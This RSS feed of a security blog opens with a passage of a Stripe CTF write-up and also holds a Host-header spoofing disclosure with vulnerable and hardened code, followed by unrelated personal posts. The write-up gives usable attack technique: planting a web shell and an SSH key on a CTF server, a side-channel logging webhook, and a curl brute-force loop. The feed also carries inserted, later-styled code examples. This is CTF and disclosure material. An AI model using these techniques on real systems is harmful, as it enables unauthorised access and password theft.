        os.remove(path)
    except OSError:
        pass

def listenUNIX(path, http_server):
    site = server.Site(http_server)
    reactor.listenUNIX(path, site, 50)
    atexit.register(cleanupSocket, path)</pre>
</td>
</tr>
</tbody>
</table>

<strong>Solution</strong>

This one was a real badass; it took me about 7 hours to crack (though I was really sleepy), and I won the CTF T-shirt after that <img src='http://abiusx.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> 

Since the code is too long to walk through, I&#8217;ll describe the scenario. There is an application that, on launch, takes a 12-digit password as input. It then launches 4 chunk servers, each holding 3 digits of the password. The chunks are in order, i.e. chunk 1 holds digits 1 to 3, chunk 2 holds digits 4 to 6, and so on.

The application receives requests on a certain endpoint (URL) and outputs a simple JSON string, either <strong>{"success":false}</strong> or <strong>{"success":true}</strong>, depending on whether your input password was right or not.

To check this, the application breaks your input into 4 chunks, sends the first one to chunk server 1 and checks whether it is valid. If it is, the second part is sent to chunk server 2 for processing, and so on. If any password chunk is invalid, processing stops right there: the later chunk servers are never contacted, and that short-circuit is the detail the rest of this solution exploits.

One more thing: you can ask the application to send the result to your own endpoint (a webhook, some port on some server) in addition to returning it directly to you. This must have something to do with solving the challenge.

Unfortunately, the application only has access to stripe-ctf servers, so you can&#8217;t run your endpoint anywhere you like. You have to obtain an endpoint on their network. Well, the level02 server is still out there.

<strong>Obtaining the endpoint server</strong>

Well, this time you can&#8217;t just upload a PHP file there. Endpoints must be reachable on a host:port directly, not under some web folder. You have to obtain SSH access to the level02 server. To do this, I first uploaded a PHP shell (Jackal) to the server. The server is very locked down, as it has been secured to prevent any other means of access.

Now you have to add your SSH public key to the server&#8217;s authorized keys list, so that you can SSH in (it doesn&#8217;t accept passwords). To do this, copy the contents of the file ~/.ssh/id_rsa.pub from your computer into the ~/.ssh/authorized_keys file on the server using the PHP shell.

Now you can ssh to <strong>user-stsqneospz@level02-3.stripe-ctf.com</strong> and have remote control over it.

Then I used the following Python code to run a web server as the endpoint. This endpoint does most of the dirty work:
<pre># the python endpoint server by AbiusX for Stripe CTF challenge 8
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer

class MyHandler(BaseHTTPRequestHandler):
    # shared across requests: running index, last seen source port,
    # and the indices whose port gap deviated from the expected value
    index = 0
    lastport = None
    suspicious = []

    def do_GET(self):
        return

    def do_POST(self):
        # read the webhook payload the challenge application POSTs to us
        varLen = int(self.headers['Content-Length'])
        postVars = self.rfile.read(varLen)
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        print self.client_address
        host, port = self.client_address
        self.wfile.write("POST OK\n")
        self.wfile.write("Data: " + str(postVars))

        # the source port gap counts the outbound connections the application
        # made since its previous webhook delivery
        if MyHandler.lastport is not None:
            portdiff = port - MyHandler.lastport
        else:
            portdiff = 0

        with open("log.txt", "a") as myfile:
            myfile.write(str(MyHandler.index) + " (" + str(portdiff) + ") " + str(postVars) + "\n")
        if portdiff != 3:  # the expected number here depends on which chunk is being brute-forced
            MyHandler.suspicious.append(MyHandler.index)
        MyHandler.index += 1
        MyHandler.lastport = port
        return

def main():
    server = HTTPServer(('', 8010), MyHandler)
    print 'started httpserver...'
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print '^C received, shutting down server'
        print "Suspicious list:\n"
        print MyHandler.suspicious
        server.socket.close()

if __name__ == '__main__':
    main()</pre>
What it does is receive a request and store the incoming address and port, plus all the request data, in a log file. As a matter of fact, it doesn&#8217;t store the actual port numbers, but the difference between the new source port and the previous one. It also stores a running index number at the start of each line of the log file.

I provide <strong>level02-3.stripe-ctf.com:8010</strong> as the endpoint, which is where the Python web server described above listens. Storing the port differences is what solves this problem.

<strong>The Idea</strong>

The application in this challenge makes one more outbound network connection when a chunk is valid than when it is not. For example, suppose we provide a password whose first chunk is invalid: the application sends this chunk to the first chunk server, gets a failure, and delivers the result to our webhook. If the chunk is valid, the result is true, so the next chunk is sent to the next chunk server before the webhook is called, hence one extra network connection. Our webhook can count these connections because the server hands out ephemeral source ports sequentially: the source port of each webhook delivery is the previous one plus the number of connections the application opened in between.

Now, using brute force, we can find the first chunk by sending 000000000000 up to 999000000000 in order to the server, and then looking at the log file of our server to see which entry has a port increment one larger than the others. Since the log file carries indexes, we can link that entry back to the number we sent.

This can be repeated for the 2nd and 3rd chunks; for the 4th we just have to brute-force for the actual true result.

Unfortunately, there is a lot of other network activity on the server, and many indexes show larger-than-usual port increments, so we have to run this brute force a few times for each chunk until only one candidate remains. The suspicious array in the server is used for that: it stores all the indices that show more than the default (2, 3 or 4, depending on the chunk) port increment, then prints them, so that we can brute-force again using only those values.

Every time we run this brute force, the candidates are reduced until only one is left. This whole process took almost 1 hour for me. Here&#8217;s the brute-force code:
<pre>import os
url = "https://level08-4.stripe-ctf.com/user-stsqneospz/"
webhook = 'level02-3.stripe-ctf.com:8010'
# try every 3-digit value for the chunk under attack; the rest of the
# password is the part recovered so far plus zero filler
for passsection in xrange(0, 1000):
    password = '165774000%03d' % passsection   # zero-padded so every guess is 12 digits
    data = '{"webhooks":["%s"],"password":"%s"}' % (webhook, password)
    command = "curl '%s' -d '%s'" % (url, data)
    print command
    res = os.system(command)
    print res</pre>
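To make the idea concrete, here is an added example (my own simulation, not the challenge&#8217;s or the author&#8217;s code) that models the application, its sequential source ports and the webhook in one process, and runs the chunk-by-chunk recovery offline, including the repeat-and-intersect step used against the noise. The secret, the starting port number and the noise rate are constructed for the example; the real attack used the webhook server and the curl loop above.

```python
# Added example, not the challenge's or the author's code: a local simulation of the
# level 8 side channel. Assumptions (constructed for the example): the application
# opens one TCP connection per chunk server it consults plus one for the webhook
# delivery, and the kernel hands out ephemeral source ports sequentially, so the
# webhook sees a source port that grows by the number of connections the application
# made since the previous delivery.
import random

CHUNK_COUNT = 4
CHUNK_LEN = 3


class PasswordApp:
    """Simulated level 8 application plus the attacker-visible webhook source port."""

    def __init__(self, secret, seed=0, noise=0.0):
        assert len(secret) == CHUNK_COUNT * CHUNK_LEN
        self.chunks = [secret[i:i + CHUNK_LEN] for i in range(0, len(secret), CHUNK_LEN)]
        self.next_port = 40000          # next ephemeral source port (constructed value)
        self.rng = random.Random(seed)
        self.noise = noise              # chance of an unrelated outbound connection per request

    def _connect(self):
        """Every outbound connection burns one sequential source port."""
        port = self.next_port
        self.next_port += 1
        return port

    def check(self, guess):
        """Verify chunks in order, stop at the first mismatch, then POST the result to
        the webhook. Returns (success, source port of the webhook connection)."""
        if self.noise > self.rng.random():  # other traffic on the host also uses ports
            self._connect()
        success = True
        for i, chunk in enumerate(self.chunks):
            self._connect()                 # connection to chunk server i + 1
            if guess[i * CHUNK_LEN:(i + 1) * CHUNK_LEN] != chunk:
                success = False
                break
        return success, self._connect()     # connection to the attacker's webhook


def recover_chunk(app, prefix, index, max_rounds=8):
    """Attacker side. With chunks 0..index-1 known, a wrong guess for chunk `index`
    costs index+1 chunk-server connections plus the webhook one, so consecutive
    webhook source ports differ by index+2. A right guess makes the application go
    on to the next chunk server: one extra connection, a gap of index+3. The last
    chunk has no next server, so there the real success flag is the only signal."""
    is_last = index == CHUNK_COUNT - 1
    candidates = ["%03d" % n for n in range(1000)]
    baseline = index + 2
    filler = "0" * (CHUNK_LEN * (CHUNK_COUNT - index - 1))
    for _ in range(max_rounds):
        suspicious = []
        _, prev_port = app.check("0" * (CHUNK_COUNT * CHUNK_LEN))  # warm-up, any guess
        for cand in candidates:
            success, port = app.check(prefix + cand + filler)
            delta = port - prev_port
            prev_port = port
            if is_last:
                if success:
                    return cand
            elif delta != baseline:     # more connections than a failure at this chunk
                suspicious.append(cand)
        candidates = suspicious         # re-run only the outliers to wash out the noise
        if len(candidates) == 1 and not is_last:
            return candidates[0]
    raise RuntimeError("no unique candidate after %d rounds" % max_rounds)


def recover_password(app):
    """Chunk-by-chunk recovery: a few thousand requests instead of 10**12."""
    prefix = ""
    for index in range(CHUNK_COUNT):
        prefix += recover_chunk(app, prefix, index)
    return prefix


if __name__ == "__main__":
    app = PasswordApp("165774000123", seed=1, noise=0.05)
    print(recover_password(app))
```

The baseline gap is index+2 because chunk server index is the last one consulted before the webhook; anything larger means the application went one server further. The simulation counts every outbound connection, which is why unrelated traffic on the box shows up as extra increments, exactly the noise that forced the repeated runs over the suspicious list in the real attack.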
I hope you had fun reading through this post.

<a href="http://abiusx.com/blog/wp-content/uploads/2012/08/stripe-ctf-winner.png"><img class="aligncenter size-medium wp-image-777" title="stripe-ctf-winner" src="http://abiusx.com/blog/wp-content/uploads/2012/08/stripe-ctf-winner-300x204.png" alt="" width="300" height="204" /></a>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/stripe-ctf-2-web-challenges/feed/</wfw:commentRss>
		<slash:comments>76</slash:comments>
		</item>
		<item>
		<title>Software Bloats: epic failure and how to prevent it</title>
		<link>http://abiusx.com/software-bloats-epic-failure-and-how-to-prevent-it/</link>
		<comments>http://abiusx.com/software-bloats-epic-failure-and-how-to-prevent-it/#comments</comments>
		<pubDate>Mon, 13 Aug 2012 16:44:24 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[English]]></category>
		<category><![CDATA[Agile Method]]></category>
		<category><![CDATA[Bloating]]></category>
		<category><![CDATA[Code Bloats]]></category>
		<category><![CDATA[Prevent Bloating]]></category>
		<category><![CDATA[Software Bloating]]></category>
		<category><![CDATA[Software Bloats]]></category>
		<category><![CDATA[TextEdit]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=752</guid>
		<description><![CDATA[Bloating is one of the most fatal horrors that can happen to a piece of software. It is when you have a nice working software that everyone loves, and then you start adding odd crazy features into the software that nobody but you (who spent numerous hours thinking how you could reach perfection in your [...]]]></description>
<content:encoded><![CDATA[Bloating is one of the most fatal horrors that can happen to a piece of software. It is when you have a nice, working piece of software that everyone loves, and then you start adding odd features to it that nobody but you (who spent numerous hours thinking about how you could reach perfection in your software) needs or uses.

It might not seem very likely, but believe me, if you don&#8217;t shackle your thoughts, you&#8217;ll definitely bloat it. For example, consider Apple TextEdit, which is roughly the Mac OS X counterpart of Notepad.

TextEdit was a very powerful tool, yet simple enough for taking a few notes. It could open MS Word documents and other RTF-like formatted documents, as well as plain ASCII text files, and it would automatically recognize the encoding and save with the appropriate encoding, all without the need to go through the application preferences.

Now they have added Versions and a lot of other magical stuff to TextEdit (as well as to many fundamental OS X apps such as Preview), and it takes ages (in comparison to a nerd&#8217;s typing speed) for it to open, save, close and behave. Personally I haven&#8217;t used Versions once in the whole year I&#8217;ve had OS X 10.7 Lion, and I don&#8217;t think anybody else has either; that&#8217;s why most people hate Versions (dare to Google it!).

Another case would be Mozilla Thunderbird, which is a magnificent piece of software, but I strongly doubt that anyone unfamiliar with the mechanics of modern e-mail protocols could cope with it.

Thunderbird is a strong mail client capable of almost anything, but I bet half of my blog readers won&#8217;t be able to start checking their mail with it. It wasn&#8217;t like that in the first few versions, but the developers got so deeply involved in the software that they could only see the world as e-mail infrastructure, and everyone has to know the difference between IMAP and POP3 to get around in their world.
<h3>How to prevent it</h3>
They say that people use 20% of a software&#8217;s features 80% of the time, so bloating will just make this percentage look uglier. The best method to prevent bloating, AFAIK, is to go agile: this way you only implement what your customer needs and uses, and if they don&#8217;t like it, you either change it or dump it.

<span id="more-752"></span>

If you&#8217;re not agile, go for your customers&#8217; feedback. Search through forums on the web and check what people think of your software and its flaws. 90% of the time, people are arguing about something <em>that is there but shouldn&#8217;t be</em>, and 10% of the time they are asking you to add features to the software.

Keep your software shiny and polished. It&#8217;s like a car: if you drive it every day, and you add some jumble to it once a day, and keep doing so for a whole year, you&#8217;re going to have a messy car you&#8217;re very comfortable with, but anyone else would panic at sitting in that goo pile, let alone driving it.

If you&#8217;re going to make your software better, don&#8217;t add features. I know your head is buzzing with ideas on how to add things to your software every night when you go to bed, but for everyone&#8217;s sake, please cut the thought.

Try to polish what you already have there, and add features only when they are really necessary. When people go out (on the Web, of course!) to shop for software, they choose the one that is most user-friendly (and also has the bare minimum features required of that genre of software) and dump everything that is hard to get along with at first. It&#8217;s a fact; don&#8217;t fool yourself.

For example, I love all OmniGroup products: many of them might lack certain advanced features, but I can always find my way around them without any hassle, and I think their huge customer base thinks just the same.

]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/software-bloats-epic-failure-and-how-to-prevent-it/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>HTTP Host Alteration Attack</title>
		<link>http://abiusx.com/http-host-alteration-attack/</link>
		<comments>http://abiusx.com/http-host-alteration-attack/#comments</comments>
		<pubDate>Sun, 15 Jul 2012 22:54:15 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[English]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Host Alteration]]></category>
		<category><![CDATA[Host Header]]></category>
		<category><![CDATA[HTTP Host]]></category>
		<category><![CDATA[HTTP Host Forging]]></category>
		<category><![CDATA[IRUnfilter]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[PHP Security]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=747</guid>
		<description><![CDATA[While I was thinking about certain ways of summarizing CSRF prevention for OWASP PHP Security Cheat Sheet - mixing taint tracking with different request criteria &#8211; I found a certain type of attack against certain high-level web applications and frameworks, which I named it HTTP Host Alteration Attack. Many web appl1ications rely on the HTTP host (accessible [...]]]></description>
<content:encoded><![CDATA[While I was thinking about ways of summarizing CSRF prevention for the <a title="OWASP PHP Security Cheat Sheet" href="https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet">OWASP PHP Security Cheat Sheet</a> (mixing taint tracking with different request criteria), I found a type of attack against certain high-level web applications and frameworks, which I named the <strong>HTTP Host Alteration Attack</strong>.

Many web applications rely on the HTTP Host header (accessible via $_SERVER['HTTP_HOST'] in PHP) to determine their running environment, e.g. development or deployment. For example, if HTTP_HOST is <em>localhost</em>, <em>127.0.0.1</em>, or <em>192.168.*.*</em>, the application is presumably running in development mode, so it dumps error details, SQL queries, profiling details and, more importantly, stack traces.

When the application is running on a deployment server, it logs errors instead of dumping them, and shows far fewer critical details on screen. The credentials for connecting to the database and other third-party tools also differ between development and deployment servers.

The code snippet below, taken from earlier versions of the almighty jFramework, is used to determine the running state of the application:
<pre>if (jURL::HTTPHost()=="localhost")
    reg("app/state","develop");
elseif (strpos(jURL::HTTPHost(),"jframework.info")!==false) #replace this with your site
    reg("app/state","deploy");
elseif (php_sapi_name()=="cli")
    reg("app/state","develop");
else
    trigger_error("No running state determined.");</pre>
The rest of the application&#8217;s behaviour is then determined by this state. What the developer (embarrassingly, myself) had forgotten there is that the Host header is supplied by the client as part of the HTTP request. Although HTTP/1.1 requires it to be present, nothing guarantees its value: the server only sees what the client chose to send, and an attacker can set it to anything, regardless of which IP address or DNS name the request actually arrived through.
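As an added example (not jFramework&#8217;s code, and not from the original post), here is the same state check rewritten in Python next to a hardened version, both run against a forged request. The raw requests, the allowlist and the APP_ENV-style server setting are constructed for the example; jframework.info is the domain from the snippet above.

```python
# Added example, not jFramework's code: the Host-header state check from the post,
# rewritten in Python, beside a hardened version. The raw requests below are
# constructed; the allowlist and the configured environment are assumptions.
import ipaddress

SITE_DOMAIN = "jframework.info"          # the deployed site's domain (from the post)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (request line, header dict). Header names
    are case-insensitive, so they are lower-cased. The Host value is client input."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def looks_local(host):
    """The kind of test the post's snippet relied on: is this a dev hostname or IP?"""
    name = host.split(":")[0]            # drop an explicit port
    if name == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(name)
    except ValueError:
        return False
    return ip.is_loopback or ip in ipaddress.ip_network("192.168.0.0/16")


def vulnerable_state(headers):
    """Mirrors the original logic: trusts the attacker-controlled Host header."""
    host = headers.get("host", "")
    if looks_local(host):
        return "develop"
    if SITE_DOMAIN in host:              # substring match, as in the original snippet
        return "deploy"
    raise ValueError("No running state determined.")


def hardened_state(headers, configured_env, allowed_hosts):
    """State comes from server-side configuration only. Host is validated against an
    explicit allowlist and never used to choose behaviour; unknown hosts are refused."""
    host = headers.get("host", "").split(":")[0].lower()
    if host not in allowed_hosts:
        raise PermissionError("unrecognised Host header: %r" % host)
    if configured_env not in ("develop", "deploy"):
        raise ValueError("APP_ENV must be set explicitly on the server")
    return configured_env


# constructed: what an attacker sends to the production server's real IP address
FORGED = (b"GET /admin HTTP/1.1\r\n"
          b"Host: localhost\r\n"
          b"User-Agent: curl/7.21\r\n\r\n")
# constructed: a normal request through the public hostname
LEGIT = (b"GET /admin HTTP/1.1\r\n"
         b"Host: www.jframework.info\r\n\r\n")


def demo():
    """Returns what each check decides for the forged and the legitimate request."""
    results = {}
    for label, raw in (("forged", FORGED), ("legit", LEGIT)):
        _, headers = parse_request(raw)
        results[label] = {"vulnerable": vulnerable_state(headers)}
        try:
            results[label]["hardened"] = hardened_state(
                headers, configured_env="deploy",
                allowed_hosts={"jframework.info", "www.jframework.info"})
        except PermissionError as e:
            results[label]["hardened"] = "400 " + str(e)
    return results


if __name__ == "__main__":
    for label, r in demo().items():
        print(label, r)
```

The forged request is answered in develop mode by the vulnerable check and with a 400 by the hardened one. Note a second weakness the rewrite keeps on purpose: the substring test also matches a Host of jframework.info.attacker.example, so even the deploy branch is attacker-selectable. The hardened version never derives state from the request; it takes it from server-side configuration and rejects any Host not on an explicit allowlist, which also turns a missing Host header into a plain 400 instead of an error page.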

I became aware of this issue while using my Mozilla add-on, <a title="IRUnfilter Mozilla Add-on" href="https://addons.mozilla.org/en-us/firefox/addon/irunfilter/">IRUnfilter</a>, to get around Iran&#8217;s Internet restrictions. IRUnfilter removes the Host header from the HTTP request (the government uses it to determine whether a site is allowed or not) and sends the request to a web proxy outside Iran, which effectively replaces the Host header with the valid value. Now if you skip the proxy and visit a jFramework-powered website using it, the &#8220;No running state determined.&#8221; error pops up.

An attacker could simply replace the Host header instead of removing it, with something fabulous such as &#8220;localhost&#8221;, to get &#8220;development&#8221; access to the deployed application. I was about to advertise jFramework&#8217;s old method of determining the state on OWASP&#8217;s wiki, but fortunately I was a little busy and realized this issue before publishing it to the world!]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/http-host-alteration-attack/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PyQtX, binary PyQt distributions for Mac OS X</title>
		<link>http://abiusx.com/pyqtx-binary-pyqt-distributions-for-mac-os-x/</link>
		<comments>http://abiusx.com/pyqtx-binary-pyqt-distributions-for-mac-os-x/#comments</comments>
		<pubDate>Sun, 08 Jul 2012 17:33:23 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[English]]></category>
		<category><![CDATA[Binary PyQt]]></category>
		<category><![CDATA[PyQt]]></category>
		<category><![CDATA[PyQt on Mac OS X]]></category>
		<category><![CDATA[PyQtX]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[Python on OS X]]></category>
		<category><![CDATA[Qt]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=743</guid>
		<description><![CDATA[Qt is a rather magnificent and silent framework. Every application I tend to find amusing and well developed, is based on Qt, but nobody really knows that. There&#8217;s not much boasting around it, as it is around .NET Framework. As a few examples, VLC, Google Earth, VirtualBox and the whole KDE desktop and all of [...]]]></description>
<content:encoded><![CDATA[Qt is a rather magnificent and silent framework. Every application I find amusing and well developed is based on Qt, but nobody really knows that. There&#8217;s not much boasting around it, as there is around the .NET Framework.

As a few examples, VLC, Google Earth, VirtualBox and the whole KDE desktop with all of its applications are based on Qt. Nowadays Qt provides cross-platform programming for Windows, OS X, Linux, Symbian, Android (beta) and Windows Mobile (beta) in a dozen programming languages (C++, Python, Java, Ruby, PHP, etc.).

Compared to GTK it is very well designed and makes for a magnificent quality of code. Unfortunately Qt&#8217;s base language is C++, which is not really suitable for most of today&#8217;s applications, since they rarely require that much performance and low-level access.

Python, on the other hand, is the jewel of high-level programming languages. PyQt is a robust Qt binding for Python, provided by Riverbank Computing. PyQt is installable on Ubuntu Linux with just a few apt commands. There is also a stable Windows installer with the Qt libraries included. Unfortunately, until now there were no OS X binary distributions, and compiling PyQt on OS X was a big hassle.

I have a separate post on how to compile the pile on OS X, but there is no need for that, as I have published PyQtX, the binary distributions of PyQt for OS X, which is available both on Riverbank Computing&#8217;s PyQt download page and on sourceforge.net at the following address:
<p style="text-align: center;"><a title="PyQtX binary distributions for OS X" href="https://sourceforge.net/projects/pyqtx/">sourceforge.net/projects/pyqtx</a></p>
<p style="text-align: left;">If you live on Mac OS X and you are a developer, this is a must-have. You need Python 2.7 to use it (obtain it from the official website).</p>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/pyqtx-binary-pyqt-distributions-for-mac-os-x/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Secure Web Application Framework (in Persian)</title>
		<link>http://abiusx.com/secure-web-application-framework-in-persian/</link>
		<comments>http://abiusx.com/secure-web-application-framework-in-persian/#comments</comments>
		<pubDate>Sun, 08 Jul 2012 11:24:09 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[اینترنت]]></category>
		<category><![CDATA[توسعه نرم افزار]]></category>
		<category><![CDATA[علمی]]></category>
		<category><![CDATA[کامپیوتر]]></category>
		<category><![CDATA[Application Security]]></category>
		<category><![CDATA[Bachelor's Thesis]]></category>
		<category><![CDATA[Document]]></category>
		<category><![CDATA[Free Document]]></category>
		<category><![CDATA[Free Thesis]]></category>
		<category><![CDATA[jFramework]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[Secure Web]]></category>
		<category><![CDATA[Security Expert]]></category>
		<category><![CDATA[Thesis]]></category>
		<category><![CDATA[Web Security]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=740</guid>
		<description><![CDATA[I just finished my Bachelor&#8217;s thesis with the topic &#8220;Secure Web Application Framework&#8221;, unfortunately it&#8217;s in Persian, thus only Persian readers can enjoy it. It&#8217;s about 200 pages, which about half of it review web concepts (theory and practice) from a security perspective. The other half has mostly advanced theory/practice about web security and the [...]]]></description>
				<content:encoded><![CDATA[I just finished my Bachelor&#8217;s thesis with the topic &#8220;Secure Web Application Framework&#8221;, unfortunately it&#8217;s in Persian, thus only Persian readers can enjoy it.

It&#8217;s about 200 pages, which about half of it review web concepts (theory and practice) from a security perspective. The other half has mostly advanced theory/practice about web security and the secure framework around it (with respect to an actual web application framework).

Unfortunately I was pushed hard by the deadline for this, and it&#8217;s not what I could call a thesis done by me, but this is probably 10 times better than any other. A glossary of the terms is also included as an appendix.


I did this thesis based on my 5 years of active career as a security expert, my 4.5 years of active OWASP participation (with a lot of code review, coding and standard review on many projects such as ESAPI, ASVS, WebGoat, etc.) and my 3 years as lead developer of jFramework.

I bet it will be interesting <img src='http://abiusx.com/blog/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> 
<p style="text-align: center;"><a title="Abbas Naderi Afooshteh Bachelor's Thesis - Secure Web Application Framework" href="/archive/document/BS-Thesis1.2.pdf">Click here to view/download</a></p>
<p style="text-align: left;"><span id="more-740"></span>PS.</p>
<p style="text-align: left;">This document is still considered a draft by me. Please address any issues/feedback to me so that I can fix them. I might complete this and publish it as a book.</p>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/secure-web-application-framework-in-persian/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Greed is Good</title>
		<link>http://abiusx.com/greed-is-good/</link>
		<comments>http://abiusx.com/greed-is-good/#comments</comments>
		<pubDate>Tue, 26 Jun 2012 19:49:36 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Cynic]]></category>
		<category><![CDATA[English]]></category>
		<category><![CDATA[cure for cynicism]]></category>
		<category><![CDATA[Cynicism]]></category>
		<category><![CDATA[cynicism cure]]></category>
		<category><![CDATA[deadly sins]]></category>
		<category><![CDATA[Greed]]></category>
		<category><![CDATA[Greed is Good]]></category>
		<category><![CDATA[greedisgood]]></category>
		<category><![CDATA[is greed evil]]></category>
		<category><![CDATA[money]]></category>
		<category><![CDATA[motivation]]></category>
		<category><![CDATA[passion]]></category>
		<category><![CDATA[Taming Greed]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=735</guid>
		<description><![CDATA[This is not about the digital world, neither about the sin or religion, but it&#8217;s good to read. I&#8217;m gonna declare a cure for cynicism here on this post. Whether you&#8217;re a Christian or a Muslim (or even irreligious), you most probably believe Greed to be a bad thing, and a deadly sin perhaps. Since [...]]]></description>
				<content:encoded><![CDATA[This is not about the digital world, nor about sin or religion, but it&#8217;s good to read. I&#8217;m gonna declare a cure for cynicism here in this post.

Whether you&#8217;re a Christian or a Muslim (or even irreligious), you most probably believe Greed to be a bad thing, and a deadly sin perhaps. Since I was a child, I always defied my own greed and tried to be as indifferent about excessive growth as possible, to control greed and not let it grow its roots inside of me and take control.

But Muslim scholars have an alternate belief, that nothing in this world is purely evil &#8211; not even sins or the devil himself &#8211; and everything is for the good of something. That one I didn&#8217;t keep in mind while I was wrestling that wicked creature&#8230;

Now I&#8217;m greedless. I&#8217;ve been greed-free for a dozen years, and nothing seems to really interest me. I&#8217;ve had my chances of acquiring huge wealth, power and status and I&#8217;ve grasped them from time to time, but always let go way before it actually meant something.

I&#8217;ve also been a cynic for a dozen years, with no interesting point in my life. Don&#8217;t get me wrong, I&#8217;m very dedicated, motivated and hardworking, and mostly successful too; I just don&#8217;t see a point. I&#8217;m not passionate about anything. I don&#8217;t love doing stuff. I don&#8217;t even like it. I just know what is good to be done, so I do it.

Out of nowhere, I realized that being greed-free is my problem. No greed causes cynicism. Greed is Good for motivation, for passion, for progress and for life. It&#8217;s not just good, it is mandatory. Let me tell you a story&#8230;

On my first trip to Iraq, a couple of friends and I visited the Bazaar to buy some goods and souvenirs to bring back for our families. The shopkeepers at the Bazaar seemed very odd from our point of view: they had no desire to sell their goods to us; they had no greed. We intended to spend considerable money, yet nobody was interested. We had to pick the goods ourselves, package them, count them and pay the price for them. To make it weirder, one of the shopkeepers left his shop in the middle of our shopping!

I started thinking: why would they want more money? There&#8217;s nothing they can get with more money. All they want &#8211; and could have &#8211; in their lives is an air conditioner, a house, and some basic food, which are all available for free there.

A couple of years later, on my second trip to Iraq, we also wanted some souvenirs, but this time things were different. The United States had established its infrastructure in Iraq, and people were greedy now. You could see the greed glowing in their eyes. They craved money. Things were much more expensive. Money was suddenly more important than anything else. Greed reigned sovereign.

Greed, like any other human emotion and desire, is a horse to tame, not a bug to kill or a weakness to destroy. Greed will devour one if it is not tamed, and can be exploited as a weakness, yet without it one cannot proceed well.]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/greed-is-good/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Speaking Session at Tarbiat Moalem University</title>
		<link>http://abiusx.com/speaking-session-at-tarbiat-moalem-university/</link>
		<comments>http://abiusx.com/speaking-session-at-tarbiat-moalem-university/#comments</comments>
		<pubDate>Tue, 03 Apr 2012 01:54:35 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Abbas Naderi]]></category>
		<category><![CDATA[Ehsan Malekian]]></category>
		<category><![CDATA[Epistemologic Information Security]]></category>
		<category><![CDATA[Epistemology]]></category>
		<category><![CDATA[Information Security]]></category>
		<category><![CDATA[Session]]></category>
		<category><![CDATA[Speaking]]></category>
		<category><![CDATA[Tarbiat Moalem]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=725</guid>
		<description><![CDATA[The next Monday, 21st Farvardin (Jalali) I&#8217;ll be having a speaking session at Tarbiat Moalem (aka Kharazmi) University, set up by my dearly respected professor, Dr. Ehsan Malekian. I&#8217;ll be covering some aspects of Epistemology combined with theories and practices of information security, and a general discussion of what is yet to come. The session [...]]]></description>
				<content:encoded><![CDATA[<p dir="ltr">The next Monday, 21st Farvardin (Jalali) I&#8217;ll be having a speaking session at Tarbiat Moalem (aka Kharazmi) University, set up by my dearly respected professor, Dr. Ehsan Malekian.</p>
<p dir="ltr">I&#8217;ll be covering some aspects of Epistemology combined with theories and practices of information security, and a general discussion of what is yet to come.</p>
<p dir="ltr">The session is held at 10:00 AM at the Computer Engineering Department, in the computer site.</p>
<p dir="ltr">Hope to see you people there.</p>
<p dir="ltr">P.S: Tarbiat Moalem University is located in Karadj city, Hesarak sq.</p>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/speaking-session-at-tarbiat-moalem-university/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Certified E-Mail with Comodo and Thunderbird</title>
		<link>http://abiusx.com/certified-e-mail-with-comodo-and-thunderbird/</link>
		<comments>http://abiusx.com/certified-e-mail-with-comodo-and-thunderbird/#comments</comments>
		<pubDate>Fri, 10 Feb 2012 19:15:02 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Comodo Email Certificate]]></category>
		<category><![CDATA[Digital Signature]]></category>
		<category><![CDATA[e-mail]]></category>
		<category><![CDATA[Electronic Mail]]></category>
